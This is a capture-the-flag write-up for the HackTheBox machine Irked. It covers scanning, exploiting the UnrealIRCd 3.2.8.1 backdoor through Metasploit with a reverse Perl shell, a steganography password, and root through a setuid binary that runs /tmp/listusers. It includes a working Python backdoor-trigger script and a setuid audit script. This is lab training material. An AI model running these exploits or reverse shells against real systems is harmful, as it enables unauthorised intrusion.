HackTheBox: Irked

Doing some retired machines for extra practice. I tried this one two years ago and got stuck. This time I got it 😀.

Scanning:

Finding running services on the default top-1000 TCP ports (SYN scan):

crazyeights@es-base:~$ sudo nmap -sS 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-01 16:49 EST
Nmap scan report for 10.10.10.117
Host is up (0.040s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind

More Thorough Scanning:

Version detection across all 65535 TCP ports:

crazyeights@es-base:~$ sudo nmap -sV -p- 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-01 16:58 EST
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
34547/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

Add the following line to /etc/hosts:

10.10.10.117	irked.htb

Web:

Index Page:

  • Enumerated the web server, and found nothing.

  • Downloaded the irked image and searched it for hidden text/files.

  • It looks like there is something in it, but I gave up at this point.

IRC:

  • Connect to the IRC service with some sort of client and you will get a banner with the version, which is of course 3.2.8.1 (you could probably just guess this as well).

  • That version ships with a well-known backdoor (CVE-2010-2075); Metasploit has a module for it:

   13  exploit/unix/irc/unreal_ircd_3281_backdoor        2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution
  • set RHOSTS to 10.10.10.117

  • set RPORT to 6697

Set the payload:

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.117     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6697             yes       The target port (TCP)


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.3       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Run the exploit:

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.117:50228) at 2021-01-01 17:19:06 -0500
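The Metasploit module is doing very little under the hood, so it is worth seeing the exchange by hand. The following is an added example, not code from the original writeup or from Metasploit: the trojaned UnrealIRCd 3.2.8.1 passes any line beginning with "AB;" to system(), so the "backdoor command" is just that prefix followed by a shell command. The host and port below are the ones from this box; the fake server in simulate() is constructed with a socketpair so the exchange can be run offline.

```python
"""Manual trigger for the UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075).

Added example (not from the original writeup). The backdoored server runs
system() on any client line that starts with "AB;", which is exactly what
exploit/unix/irc/unreal_ircd_3281_backdoor sends.
"""
import socket

TRIGGER = b"AB;"  # prefix the trojaned s_bsd.c checks before calling system()


def build_trigger(cmd: str) -> bytes:
    """Return the raw line the backdoor reacts to, e.g. b'AB;id\\n'."""
    if "\n" in cmd or "\r" in cmd:
        raise ValueError("command must be a single line")
    return TRIGGER + cmd.encode() + b"\n"


def read_banner(sock, timeout: float = 3.0) -> str:
    """Read the server's greeting (':irked.htb NOTICE AUTH :*** ...')."""
    sock.settimeout(timeout)
    chunks = []
    try:
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
            if b"\n" in data:
                break
    except socket.timeout:
        pass
    return b"".join(chunks).decode(errors="replace")


def fire(sock, cmd: str) -> str:
    """Wait for the banner, then send the backdoor line. Returns the banner."""
    banner = read_banner(sock)
    sock.sendall(build_trigger(cmd))
    return banner


def exploit(host: str, port: int, cmd: str) -> str:
    """Connect to a live target and fire cmd. Network call: not run in the demo."""
    with socket.create_connection((host, port), timeout=5) as s:
        return fire(s, cmd)


def simulate():
    """Constructed offline stand-in for the server side of the exchange."""
    srv, cli = socket.socketpair()
    try:
        # what the real box printed when the module connected
        srv.sendall(b":irked.htb NOTICE AUTH :*** Looking up your hostname...\r\n")
        banner = fire(cli, "id")
        received = srv.recv(4096)  # what a backdoored server would hand to system()
    finally:
        srv.close()
        cli.close()
    return banner, received


if __name__ == "__main__":
    # Against the box: exploit("10.10.10.117", 6697, "<reverse shell one-liner>")
    print(simulate())
```

On the real target the command would be a reverse shell one-liner (the Perl payload Metasploit used does the same job) with a listener waiting on the attack box; nothing in the protocol needs IRC registration first, which is why the backdoor fires before any NICK/USER exchange.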

User:

Spawn an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ 

Enumerating /home shows a second user, djmardov.

Listing his home folder recursively shows the user flag and a hidden file, .backup:

ls -aR
.:
.	       .bashrc	Desktop    .gnupg	  Music     .ssh
[SNIP]

./Documents:
.  ..  .backup	user.txt

We do not have permission to read user.txt, but we can read .backup:

ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
  • The ‘steg’ in ‘Super elite steg backup pw’ suggests that this is a passphrase for a steganography tool.

  • Go back to irked.jpg.

Stego:

Extract hidden file from irked.jpg:

crazyeights@es-base:~/Downloads$ steghide extract -sf irked.jpg 
Enter passphrase: 
wrote extracted data to "pass.txt".

crazyeights@es-base:~/Downloads$ cat pass.txt 
Kab6h+m+bbp2J:HG

Use the extracted password to log in over SSH as djmardov:

crazyeights@es-base:~$ ssh djmardov@10.10.10.117

User Flag:

djmardov@irked:~$ cd Documents/
djmardov@irked:~/Documents$ ls
user.txt
djmardov@irked:~/Documents$ cat user.txt 
4a66a_i_dont_want_to_get_in_trouble

Root:

Find setuid binaries, i.e. programs that run with the file owner's euid (root for most of them):

djmardov@irked:~/Documents$ find / -perm /4000 2>/dev/null
[SNIP]
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
  • The binary viewuser is not part of a standard Debian install, so it is worth a closer look.

  • Running viewuser shows that it hands /tmp/listusers to sh, and that file doesn't exist:

djmardov@irked:~/Documents$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-01-01 16:42 (:0)
djmardov pts/1        2021-01-01 17:26 (10.10.14.3)
sh: 1: /tmp/listusers: not found
djmardov@irked:~/Documents$ 
  • /tmp is world-writable, so we can create /tmp/listusers ourselves, and viewuser will execute it with euid root.

  • Insert a shell into the file listusers and make it executable (without a shebang, sh falls back to interpreting it as a script):

djmardov@irked:~/Documents$ cd /tmp
djmardov@irked:/tmp$ echo /bin/sh > listusers
djmardov@irked:/tmp$ chmod a+x listusers

Run viewuser again:

djmardov@irked:/tmp$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-01-01 16:42 (:0)
djmardov pts/1        2021-01-01 17:26 (10.10.14.3)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
#

It calls our program listusers, which gives us a root shell. Note the id output: uid is 0 but gid is still 1000, so viewuser raises only the uid (setuid without setgid) before shelling out.
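The viewuser finding generalises: a setuid-root binary that executes a fixed path under a world-writable directory can be hijacked by anyone who can create that file. Below is an added example, not code from the original writeup, that automates the enumeration step: it walks a tree for setuid files and pulls printable strings out of them (the same heuristic as strings) looking for absolute paths rooted in /tmp, /var/tmp or /dev/shm. The fake viewuser in demo() is constructed in a temporary directory; only the /tmp/listusers string is taken from the box, via the error message above.

```python
"""Audit setuid binaries for hard-coded paths in world-writable directories.

Added example (not from the original writeup). Complements `find / -perm
/4000` by flagging which setuid files reference paths an unprivileged user
could create, the pattern viewuser exposed with /tmp/listusers.
"""
import os
import re
import stat
import tempfile

# Directories every local user can create files in on a default Debian install.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Printable runs of at least 4 bytes: the same heuristic `strings` uses.
_STRINGS_RE = re.compile(rb"[\x20-\x7e]{4,}")
# Absolute path candidates inside a printable run.
_PATH_RE = re.compile(r"/[\w./-]+")


def is_setuid(path: str) -> bool:
    """True for regular files with the setuid bit set (find -perm -4000)."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_setuid(root: str):
    """Yield setuid regular files under root, ignoring unreadable directories."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            full = os.path.join(dirpath, name)
            if is_setuid(full):
                yield full


def risky_paths(binary: str):
    """Absolute paths embedded in binary that live in world-writable dirs."""
    with open(binary, "rb") as fh:
        data = fh.read()
    hits = set()
    for run in _STRINGS_RE.findall(data):
        for path in _PATH_RE.findall(run.decode("ascii")):
            if path.startswith(WORLD_WRITABLE_DIRS):
                hits.add(path)
    return sorted(hits)


def audit(root: str):
    """Map each setuid file under root to the risky paths it references."""
    report = {}
    for binary in find_setuid(root):
        paths = risky_paths(binary)
        if paths:
            report[binary] = paths
    return report


def demo():
    """Constructed scenario: a fake setuid 'viewuser' plus a non-setuid decoy."""
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, "viewuser")
        with open(fake, "wb") as fh:
            # not a real ELF; just enough bytes to carry the strings of interest
            fh.write(b"\x7fELF\x00\x00This application is being devleoped\x00"
                     b"/tmp/listusers\x00/bin/sh\x00")
        os.chmod(fake, 0o4755)  # setuid bit on a file we own needs no root
        decoy = os.path.join(tmp, "decoy")
        with open(decoy, "wb") as fh:
            fh.write(b"/tmp/also_here\x00")  # same string, but not setuid
        os.chmod(decoy, 0o755)
        return {os.path.basename(k): v for k, v in audit(tmp).items()}


if __name__ == "__main__":
    print(demo())  # on the box you would call audit("/") as djmardov
```

This is a static heuristic: it finds literal paths compiled into the binary, not ones built at run time, so a hit is a lead to confirm with ltrace or strace (watching for system()/execve on the path) rather than proof on its own.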

Root Flag:

# cd /root
# ls
pass.txt  root.txt
# cat pass.txt
Kab6h+m+bbp2J:HG
# cat root.txt
8d8e9_i_dont_want_to_get_in_trouble

FIN.